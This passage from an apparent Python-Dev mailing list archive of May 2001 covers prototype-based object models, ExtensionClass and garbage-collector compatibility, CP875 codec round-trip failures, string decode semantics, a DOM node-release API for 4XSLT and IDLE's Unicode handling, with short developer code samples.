via ssh if you think that > would help debug the problem. I'd be willing to take a look (the chances of me reproducing it don't look good). A public RSA key is attached. Neil 1024 35 1372392199657274371686721919189033793743756930167147933612297754126= 598259273931615299793939606535704607722644783446173838392284136573447881967= 319012596588320802053877521752598768614155667872751121516571978298556660249= 308172933987227071278497487693980378602960539924485391548971170156265529348= 77126704135564999 nas --HlL+5n6rz5pIUxbD Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjr9SKYACgkQIyPjKbgF8jfQxQCfbIUUgut9FXK2qCF8+bPQc7G+ ktAAn0nJExCgF3/4fftE+4yWwD74cc1f =Tt/R -----END PGP SIGNATURE----- --HlL+5n6rz5pIUxbD-- From sdm7g@Virginia.EDU Sat May 12 16:07:06 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 11:07:06 -0400 (EDT) Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Yeah ... What Tim said... Also: There are two basic implementation models: Delegation [a.k.a. "Lifetime sharing", cloning] sort of like python -- if you don't know how to handle it "ask" a parent object. ( "ask" in quotes, because I've recently been in a long argument about whether objective-C & smalltalk can really be said to "send messages" , or if it's "just" dynamic lookup and function application! ) Extension [a.k.a. "Birth sharing", copying, concatenation ] more like how I imaging C++ vtables are built -- the python equivalent would be like merging all of the class __dict__'s together with name-clase priority going to the nearest relative. ( "Life Sharing" vs. "Birth Sharing" -- is a change in the base class after object creation inherited by the object? ) I think most Multiple-Inheritance languages use delegation, but no reason it won't work in extension. The diff is that in extension, everything has to get resolved at object creation. Extension could be made more flexible if on creation, you could not only add new methods, but rearrange and control the extension process ( sort of like "from xxx import yyy; from aaa import bbb" ). I would think one could use delegation by default, but provide an extension mechanism as an optimization, but I don't know if there's any system that does this. If it follows the paradigm, a prototype system doesn't have an 'isa' or '__class__' slot -- only a (linked) list of parent objects. But if you were simulating class orientation, one would add an 'isa' slot for the immediate prototype, and probably enforce some restrictions on the prototype objects that were playing the role of class objects. "If it follow the paradigm" -- as in OO in general, there are several flavors and implementations and some are may be hybrid systems. Self is the language most widely known as a prototype based language: some others: Newtonscript (from apple's late lamented Newton palmtop), Kevo (a forth based o-o language), Cardelli's Obliqu (This didn't stick in my mind from when I read the papers back in the "safe python" development days, but it's listed in my book.) as well as XlispStat's object system. (which isn't listed in that book but there is an ObjectLisp -- I don't know if they were at all related. ) -- and Tim said JavaScript. The Amulet and Garnet GUI systems are prototype based -- Garnet written in Lisp and Amulet in C++. For NewtonScript, Kevo, and maybe JavaScript, I suspect the simplicity of the system was a motivation. ("the book" I'm reading is "Prototype-Based Programming -- Concepts, Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan Moore, pub. Springer. A collection of papers, some of which are available on the Web -- I know the Self papers, one description of NewtonScript, and one or two articles on Kevo are online, as well as Cardelli's Obliq paper. ) -- "Steve" Majewski From martin@loewis.home.cs.tu-berlin.de Sat May 12 20:16:58 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 21:16:58 +0200 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> > Has anyone investigated interactions between ExtensionClass objects > and GC? At some point, extension classes used a literal copy of PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, and only had the spare fields that were expected then. Today, PyTypeObject has much more fields, so extension objects produce random errors (eg. with GC) when used in a modern interpreter (where the copy has not been synchronized). Whatever immediately follows the type object in memory may be interpreted as GC flag. Regards, Martin From guido@digicool.com Sat May 12 22:08:05 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:08:05 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200." <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> > At some point, extension classes used a literal copy of > PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, > and only had the spare fields that were expected then. Today, > PyTypeObject has much more fields, so extension objects produce random > errors (eg. with GC) when used in a modern interpreter (where the copy > has not been synchronized). Whatever immediately follows the type > object in memory may be interpreted as GC flag. Not quite true. ExtensionClasses (at least recent versions that worked with 1.5.2) contain a copy of the type object up to and including the tp_flags field, and the 2.1 code is careful not to use any newer fields without first checking the corresponding flag bit. Now, if you are using the 1.4 version of ExtensionClasses you might not have the tp_flags field either (I don't know, I can't easily check) but the 1.5.2-compatible version of ExtensionClasses doesn't even require recompilation to work with Python 2.1. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Sat May 12 21:12:39 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 22:12:39 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> > But I don't know whether the ambiguity in cp875 is a bug or an > undocumented feature The official (as in "as official as it gets") mapping between CP 875 and Unicode is at http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT This is also the file which served as an input to generate cp875.py. Character 1A, which is the mapping result of these characters, is indeed known with the name "SUBSTITUTE", apparently following the definition in http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm # substitute character (SUB): A control character that is used in the # place of a character that is recognized to be invalid or in error or # that cannot be represented on a given device. That would suggest that these characters in EBCDIC 875 do not have equivalents in Unicode. However, http://www.kostis.net/charsets/ebc875.htm suggests that the characters in question (3F, DC, E1, EC, ED, FC, and FD) have no character meaning at all. It seems that IBM's ICU library also maps U+001A to character 3F, see http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup It appears, from looking at http://www.natural-innovations.com/boo/asciiebcdic.html that byte 3F *is* the substitution character in EBCDIC. So it is a bug in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC character which is mapped to SUBSTITUTE; I think cp875 should be corrected to always map U+001A to 3F. That is not something the generator can currently do, though. So I think we can take one of two approaches: 1. admit that CP 875 is not round-trippable, and exclude it from the test (although when looking at the first 128 characters only, it is round-trippable). 2. remove the SUBSTITUTE mappings from CP875, acknowledging that apparently these characters have no meaning in that code page. Unfortunately, I could not find any official IBM documentation page that lists the characters supported in each of the EBCDIC code pages. The second seems to be more corrrect to me, although it is a deviation from the Unicode consortium publications. Regards, Martin From guido@digicool.com Sat May 12 22:21:21 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:21:21 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400." References: Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> > Also: There are two basic implementation models: > > Delegation [a.k.a. "Lifetime sharing", cloning] > sort of like python -- if you don't know how to handle it "ask" > a parent object. ( "ask" in quotes, because I've recently been > in a long argument about whether objective-C & smalltalk can > really be said to "send messages" , or if it's "just" dynamic > lookup and function application! ) > > Extension [a.k.a. "Birth sharing", copying, concatenation ] > more like how I imaging C++ vtables are built -- the python > equivalent would be like merging all of the class __dict__'s > together with name-clase priority going to the nearest > relative. > > ( "Life Sharing" vs. "Birth Sharing" -- is a change in the > base class after object creation inherited by the object? ) Interesting. So is the rest of this thread, but since Python is not a prototype language and is unlikely to become one, I'd like to mention that Python 2.2 will likely allow you to choose either paradigm, on a per-class basis, using metaclasses. I'm finding metaclasses in Python useful for different things than they are in Smalltalk, and I expect that they will continue to play a less important role. But they are important because they control many "policy" aspects of Python classes/types: e.g. whether instances have a __dict__ or a specific set of slots (maybe even typed slots), whether changes can be made to a class after it's been created, the semantics of multiple inheritance, and so on. Right now, my metaclasses continue to be implemented in C, although I expect that eventually they will be subclassable in Python. Watch the descr-branch in the CS tree. I hope I'll soon have some time to write a PEP, too. It's an interesting journey! The book I am reading about this: "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. http://cseng.awl.com/book/0,3828,0201433052,00.html --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g@Virginia.EDU Sat May 12 21:53:26 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 16:53:26 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> Message-ID: On Sat, 12 May 2001, Guido van Rossum wrote: > Interesting. So is the rest of this thread, but since Python is not a > prototype language and is unlikely to become one, I'd like to mention > that Python 2.2 will likely allow you to choose either paradigm, on a > per-class basis, using metaclasses. As I said earlier: the only advantage would be if it could simplify things "under the hood" (compared to metaclasses) but could still provide the same Class semantics (with maybe a "proto" declaration sneaking it's nose in under the tent.) But I have no immediate idea on how to do that, and it sounds like you're pretty far along into an implementation already. > I'm finding metaclasses in Python useful for different things than > they are in Smalltalk, and I expect that they will continue to play a > less important role. But they are important because they control many > "policy" aspects of Python classes/types: e.g. whether instances have > a __dict__ or a specific set of slots (maybe even typed slots), > whether changes can be made to a class after it's been created, the > semantics of multiple inheritance, and so on. I guess my practical quesion, which I meant to ask before I got myself sidetracked into preaching prototypes is: How much of the existing plumbing (specifically the Don Beaudry hack) can I rely on in the future for the objective-C/python bridge ? With BOOST and Zope's extension classes relying on it, can I assume that it's being extended rather than replaced ? ( I guess I ought to take a look at the code! ) > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html Thanks for the reference. Talking about interesting journies: Guido: did you ever imagine back at that first workshop at NIST that you and Python would be where you are today ? -- Steve Majewski From gmcm@hypernet.com Sat May 12 22:09:41 2001 From: gmcm@hypernet.com (Gordon McMillan) Date: Sat, 12 May 2001 17:09:41 -0400 Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> References: Your message of "Sat, 12 May 2001 11:07:06 -0400." Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost> [Guido] > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html The two things that struck me most when I read that last year: - How eminently ill-suited C++ is for this stuff (the book develops a framework in C++) - a very convincing argument that if you derive C from A and B (whose metaclasses are not the same), the system must derive a metaclass for C, using MI from A and B's metaclasses. duct-tape-skull-cap-advised-ly y'rs - Gordon From tim.one@home.com Sat May 12 22:22:49 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 12 May 2001 17:22:49 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: [/F] > reverse sorting makes sense to me. but the cp-files appear to be > machine generated, so patching that python file won't help. Agreed. > a truly future-proof solution would be to specify exactly how to > resolve every many-to-one mapping, for every font having that > problem. but sorting them is clearly better than relying on > implementation-dependent behaviour... The attached program suggests the problem is rare; of those encoding files that have a Python decode_map dict, only these triggered a meaningful ambiguity complaint: *** cp1006.py maps 0xfe8e back to 0xb1, 0xb2 *** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd Then since test_unicode only checks for roundtrip across range(0x80), cp875 is the only one that *can* fail (the ambiguities in cp1006 are for points > 0x7f, so aren't tested here). Hmm! Now I see that in a part of test_unicode that wasn't reached, cp875 and cp1006 are excluded, with this comment: ### These fail the round-trip: #'cp1006', 'cp875', 'iso8859_8', So the practical hack for now is to exclude cp875 from the earlier range(128) roundtrip test too. > (is Jython using exactly the same hashing and dictionary algorithms as > CPython? or does it work by accident also under Jython?) Sorry, no idea. Attempting to browse the Jython source on SourceForge caused this cute behavior: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/ Python Exception Occurred Traceback (innermost last): File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ? main() File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main view_directory(request) File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory fileinfo, alltags = get_logs(full_name, rcs_files, view_tag) File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs raise 'error during rlog: '+hex(status) error during rlog: 0x100 let's-rewrite-it-in-php-ly y'rs - tim ENCODING_DIR = "../Lib/encodings" import os import imp def d(w): if type(w) is type(6): return hex(w) else: return repr(w) encfiles = [name for name in os.listdir(ENCODING_DIR) if name.endswith(".py") and name[0] != "_"] for fname in encfiles: path = os.path.join(ENCODING_DIR, fname) f = open(path) module = imp.load_source(fname[:-3], path, f) f.close() decode = getattr(module, "decoding_map", None) if decode is None: print fname, "doesn't have decoding_map." continue vtok = {} for k, v in decode.items(): if v in vtok: vtok[v].append(k) else: vtok[v] = [k] ambiguous = [(v, ks) for v, ks in vtok.items() if len(ks) > 1] if ambiguous: for v, ks in ambiguous: ks.sort() print "***", fname, "maps", d(v), "back to", \ ", ".join(map(d, ks)) else: print fname, "is free of ambiguous reverse maps." From tim.one@home.com Sat May 12 22:48:38 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 12 May 2001 17:48:38 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, whose encyclopedic knowledge of encoding details still isn't enough to get a clear answer (it's like somebody asking me for a simple answer to a floating point question ] > ... > So I think we can take one of two approaches: > > 1. admit that CP 875 is not round-trippable, and exclude it from the > test (although when looking at the first 128 characters only, it > is round-trippable). As I noted later, 875 is already excluded from the roundtrip test across range(128, 256). What it's failing is the roundtrip test across range(128): after unicode("?", "cp875") produces u'\x1a', the following .encode('c875') has no way to know which range the original input came from. So it's not really round-trippable across range(128) either unless more info is given to .encode(). > 2. remove the SUBSTITUTE mappings from CP875, acknowledging that > apparently these characters have no meaning in that code page. > Unfortunately, I could not find any official IBM documentation > page that lists the characters supported in each of the EBCDIC > code pages. > > The second seems to be more corrrect to me, although it is a deviation > from the Unicode consortium publications. Until you and MAL agree on the best thing to do (I have no opinion: my only exposure to Unicode in daily programming life remains the Python test suite), I'm going to opt for #1: as cp875.py stands today, it's simply a fact that it's not round-trippable across any range including 0x3f. From martin@loewis.home.cs.tu-berlin.de Sat May 12 23:32:10 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 00:32:10 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> > Now, if you are using the 1.4 version of ExtensionClasses you might > not have the tp_flags field either (I don't know, I can't easily > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > even require recompilation to work with Python 2.1. I'll attach a copy below of the struct as defined in pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension classes). As you can see, it does not provide tp_flags, but has a field of tp_xxx4 for it. That *should* work, except that it also has its 'methods' field where tp_traverse would go, and its class_flags field where tp_clear would go. Now, you write > ExtensionClasses (at least recent versions that worked with 1.5.2) > contain a copy of the type object up to and including the tp_flags > field, and the 2.1 code is careful not to use any newer fields > without first checking the corresponding flag bit. In this generality, it is apparently not true: Modules/gcmodule.c has, in delete_garbage, if ((clear = op->ob_type->tp_clear) != NULL) { ... traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; (void) traverse(PyObject_FROM_GC(gc), (visitproc)visit_decref, NULL); which does not check any flags. That still shouldn't cause any problems, since the Gtk objects should never end up in the GC lists - but may be I'm missing something. Regards, Martin typedef struct { PyObject_VAR_HEAD char *tp_name; /* For printing */ int tp_basicsize, tp_itemsize; /* For allocation */ /* Methods to implement standard operations */ destructor tp_dealloc; printfunc tp_print; getattrfunc tp_getattr; setattrfunc tp_setattr; cmpfunc tp_compare; reprfunc tp_repr; /* Method suites for standard classes */ PyNumberMethods *tp_as_number; PySequenceMethods *tp_as_sequence; PyMappingMethods *tp_as_mapping; /* More standard operations (at end for binary compatibility) */ hashfunc tp_hash; ternaryfunc tp_call; reprfunc tp_str; getattrofunc tp_getattro; setattrofunc tp_setattro; /* Space for future expansion */ long tp_xxx3; long tp_xxx4; char *tp_doc; /* Documentation string */ #ifdef COUNT_ALLOCS /* these must be last */ int tp_alloc; int tp_free; int tp_maxalloc; struct _typeobject *tp_next; #endif PyMethodChain methods; long class_flags; PyObject *class_dictionary; PyObject *bases; PyObject *reserved; } PyExtensionClass; From martin@loewis.home.cs.tu-berlin.de Sun May 13 13:08:02 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 14:08:02 +0200 Subject: [Python-Dev] ReleaseNode interface in 4XSLT Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Currently, 4XSLT has a dependency on the DOM implementation in terms of memory management (among other dependencies). I'd like to reduce this dependency, by providing a centralized function that knows how to release nodes. In PyXML, I currently use # Define ReleaseNode in a DOM-independent way import xml.dom.ext import xml.dom.minidom def _releasenode(n): if isinstance(n, xml.dom.minidom.Node): n.unlink() else: xml.dom.ext.ReleaseNode(n) try: from Ft.Lib import pDomlette def ReleaseNode(n): if isinstance(n, pDomlette.Node): pDomlette.ReleaseNode(n) else: _releasenode(n) _XsltElementBase = pDomlette.Element except ImportError: ReleaseNode = _releasenode from minisupport import _XsltElementBase This code knows how to release minidom, 4DOM, and pDomlette nodes, and supports installations without 4Suite (i.e. without pDomlette). I've put this into xslt/__init__.py, so that all callers of Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. If desired, I could produce a patch against the public Ft CVS. As a slightly independent question, such a function also ought to support DOM implementations not known to it; I'm thinking in particular of the Zope DOMs. I'd like to hear proposals on how such an interface should work; I see three options: a) it is an operation on the document node (or any node), as in minidom. b) it is an operation on the DOM implementation (almost as in 4Suite; you'd need to navigate from the node to the implementation, then you'd need a well-known operation on the implementation) c) the code assumes that no release activity is necessary for unknown DOMs, effectively believing in reference counting, garbage collection, acquisition, and other black art. Any comments appreciated, in particular 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and 2. from authors of other DOMs on a general memory management API for Python DOM. Regards, Martin From mwh@python.net Sun May 13 13:36:26 2001 From: mwh@python.net (Michael Hudson) Date: 13 May 2001 13:36:26 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Fredrik Lundh wrote: > > can you take that again? shouldn't michael's example be > > equivalent to: > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > if not, I'd argue that your "decode" design is broken, instead > > of just buggy... > > Well, it is sort of broken, I agree. The reason is that > PyString_Encode() and PyString_Decode() guarantee the returned > object to be a string object. To be able to reuse Unicode codecs > I added code which converts Unicode back to a string in case the > codec return an Unicode object (which the .decode() method does). > This is what's failing. It strikes me that if someone executes aString.decode("latin-1") they're going to expect a unicode string. AIUI, what's currently happening is that the string is converted from a latin-1 8-bit string to the 16-bit unicode string I expected and then there is an attempt to convert it back to an 8-bit string using the default encoding. So if I'd done a sys.setdefaultencoding("latin-1") in my sitecustomize.py, then aString.decode("latin-1") would just be aString again? This doesn't seem optimal. > Perhaps I should simply remove the restriction and have both APIs > return the codec's return object as-is ?! (I would be in favour of > this, but I'm not sure whether this is already in use by someone...) Are all the codecs ditributed with Python 2.1 unicode-related? If that's the case, PyString_Decode isn't terribly useful is it? It seems unlikely that it received much use. Could be wrong of course. OTOH, maybe I'm trying to wedge to much behaviour onto a a particular operation. Do we want open(file).read().decode("jpeg") -> some kind of PIL object to be possible? Cheers, M. -- GET *BONK* BACK *BONK* IN *BONK* THERE *BONK* -- Naich using the troll hammer in cam.misc From mal@lemburg.com Sun May 13 17:53:55 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 18:53:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: <3AFEBC22.1F0AF685@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Fredrik Lundh wrote: > > > can you take that again? shouldn't michael's example be > > > equivalent to: > > > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > > > if not, I'd argue that your "decode" design is broken, instead > > > of just buggy... > > > > Well, it is sort of broken, I agree. The reason is that > > PyString_Encode() and PyString_Decode() guarantee the returned > > object to be a string object. To be able to reuse Unicode codecs > > I added code which converts Unicode back to a string in case the > > codec return an Unicode object (which the .decode() method does). > > This is what's failing. > > It strikes me that if someone executes > > aString.decode("latin-1") > > they're going to expect a unicode string. AIUI, what's currently > happening is that the string is converted from a latin-1 8-bit string > to the 16-bit unicode string I expected and then there is an attempt > to convert it back to an 8-bit string using the default encoding. So > if I'd done a > > sys.setdefaultencoding("latin-1") > > in my sitecustomize.py, then aString.decode("latin-1") would just be > aString again? This doesn't seem optimal. True and that's why I am proposing to losen the restriction on having the two APIs returning strings only. > > Perhaps I should simply remove the restriction and have both APIs > > return the codec's return object as-is ?! (I would be in favour of > > this, but I'm not sure whether this is already in use by someone...) > > Are all the codecs ditributed with Python 2.1 unicode-related? If > that's the case, PyString_Decode isn't terribly useful is it? It > seems unlikely that it received much use. Could be wrong of course. All standard codecs in 2.0 and 2.1 are Unicode related. I am planning to write up a bunch of string-to-string codecs next week though which will then be the first non-Unicode related codecs in 2.2. > OTOH, maybe I'm trying to wedge to much behaviour onto a a particular > operation. Do we want > > open(file).read().decode("jpeg") -> some kind of PIL object > > to be possible? This would be possible indeed. Even though some may find this coding style obscure, I think this technique has the same usefulness as e.g. piping at OS level. I am thinking of these use cases: "äöü".decode("latin-1") -> Unicode (object construction) "...jpeg data...".decode("jpeg") -> JpegImage object (dito) "äöü".decode("latin-1").encode("cp1521") -> string (recoding data) "...long data...".encode("gzip") -> string (transfer encoding) "...gzipped data...".decode("gzip") -> string (transfer decoding) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Sun May 13 18:20:01 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:20:01 +0200 Subject: [Python-Dev] Re: Ill-defined encoding for CP875? References: Message-ID: <3AFEC241.62084286@lemburg.com> Tim Peters wrote: > > I have a way to make dict lookup a teensy bit cheaper(*) that significantly > reduces the number of collisions (which is much more valuable). > > This caused a number of std tests to fail, because they were implicitly > relying on the order in which a dict's entries are materialized via .keys() > or .items(). > > Most of these were easy enough to fix. The last failure remaining is > test_unicode, and I don't know how to fix it. It's dying here: > > try: > verify(unicode(s,encoding).encode(encoding) == s) > except TestFailed: > print '*** codec "%s" failed round-trip' % encoding > except ValueError,why: > print '*** codec for "%s" failed: %s' % (encoding, why) > > when encoding == "cp875". There's a bogus problem you have to worm around > first: test_unicode neglected to import TestFailed, so it actually dies > with NameError while trying the "except TestFailed" clause after verify() > raises TestFailed. Once that's repaired, it's complaining about failing the > round-trip encoding. Ooops; this must have been caused by the assert statment removal in the test suite I hacked up some months ago. Funny that it never showed up... the code seems to be very robust ;-) > The original character in s it's griping about is "?" (0x3f). cp875.py has > this entry in its decoding_map dict: > > 0x003f: 0x001a, # SUBSTITUTE > > But 0x1a is not a *unique* value in this dict. There's also > > 0x00dc: 0x001a, # SUBSTITUTE > 0x00e1: 0x001a, # SUBSTITUTE > 0x00ec: 0x001a, # SUBSTITUTE > 0x00ed: 0x001a, # SUBSTITUTE > 0x00fc: 0x001a, # SUBSTITUTE > 0x00fd: 0x001a, # SUBSTITUTE > > Therefore what appears associated with 0x1a in the derived encoding_map > dict: > > encoding_map = {} > for k,v in decoding_map.items(): > encoding_map[v] = k > > may end up being any of the 7 decoding_map keys that map to 0x1a. It just > so happened to map back to 0x3f before, but to 0xfd after the dict change, > so "?" doesn't survive the round trip anymore. The "right" thing to do here, is to simply remove cp875 from the test for round-tripping. It is not the only encoding which fails this test, but it's not our fault: the codecs were all generated from the original codec maps at the Unicode.org site. If their mappings are broken, we can't do much about it... other than to ignore the error or remove the codec altogether. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Sun May 13 18:40:58 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:40:58 +0200 Subject: [Python-Dev] IDLE and non-ASCII characters References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <3AFEC72A.33076220@lemburg.com> Martin von Loewis wrote: > > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='äö' > UnicodeError: ASCII encoding error: ordinal not in range(128) > > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. > > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. > > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. I have a bug report assigned to myself which indicates similar problems with _tkinter and Tk/Tcl. There were other problem reports on the German Python mailing list going in the same direction too. The basic problem seems to be that Tk/Tcl applies too much magic to the text widget contents in order to find out the used encoding and this can easily cause the whole encoding mechanism to fail. A Tk/Tcl expert should really look into this and fix _tkinter.c to aid Tk/Tcl in not mixing up the encodings (e.g. it would probably be a good idea to recode Python 8bit-strings into whatever encoding Tk/Tcl assumes as default). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From Mike.Olson@fourthought.com Sun May 13 19:15:46 2001 From: Mike.Olson@fourthought.com (Mike Olson) Date: Sun, 13 May 2001 12:15:46 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Message-ID: <3AFECF52.FF7E9B26@FourThought.com> "Martin v. Loewis" wrote: > > > In PyXML, I currently use > > # Define ReleaseNode in a DOM-independent way > import xml.dom.ext > import xml.dom.minidom > def _releasenode(n): > if isinstance(n, xml.dom.minidom.Node): > n.unlink() > else: > xml.dom.ext.ReleaseNode(n) > > try: > from Ft.Lib import pDomlette > def ReleaseNode(n): > if isinstance(n, pDomlette.Node): > pDomlette.ReleaseNode(n) > else: > _releasenode(n) > _XsltElementBase = pDomlette.Element > except ImportError: > ReleaseNode = _releasenode > from minisupport import _XsltElementBase > > This code knows how to release minidom, 4DOM, and pDomlette nodes, and > supports installations without 4Suite (i.e. without pDomlette). I've > put this into xslt/__init__.py, so that all callers of > Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. > If desired, I could produce a patch against the public Ft CVS. What if we put these on the implementation, that or came up with a standard interface on the node. Then, every DOM imp that wants to be compatible with xpath/xslt needs to support this interface? node.ownerDocument.implementation.releaseNode(node) or node.py_unlink() > > As a slightly independent question, such a function also ought to > support DOM implementations not known to it; I'm thinking in > particular of the Zope DOMs. I'd like to hear proposals on how such an > interface should work; I see three options: See above > > a) it is an operation on the document node (or any node), as in minidom. > b) it is an operation on the DOM implementation (almost as in 4Suite; > you'd need to navigate from the node to the implementation, then > you'd need a well-known operation on the implementation) > c) the code assumes that no release activity is necessary for unknown > DOMs, effectively believing in reference counting, garbage collection, > acquisition, and other black art. I like either a or b Mike > > Any comments appreciated, in particular > 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and > 2. from authors of other DOMs on a general memory management API for > Python DOM. > > Regards, > Martin > > _______________________________________________ > 4suite mailing list > 4suite@lists.fourthought.com > http://lists.fourthought.com/mailman/listinfo/4suite -- Mike Olson Principal Consultant mike.olson@fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one@home.com Sun May 13 19:31:42 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 14:31:42 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFEC241.62084286@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > The "right" thing to do here, is to simply remove cp875 > from the test for round-tripping. I'm relieved you think so, since that's what I already did . > It is not the only encoding which fails this test, but it's not > our fault: the codecs were all generated from the original codec > maps at the Unicode.org site. > > If their mappings are broken, we can't do 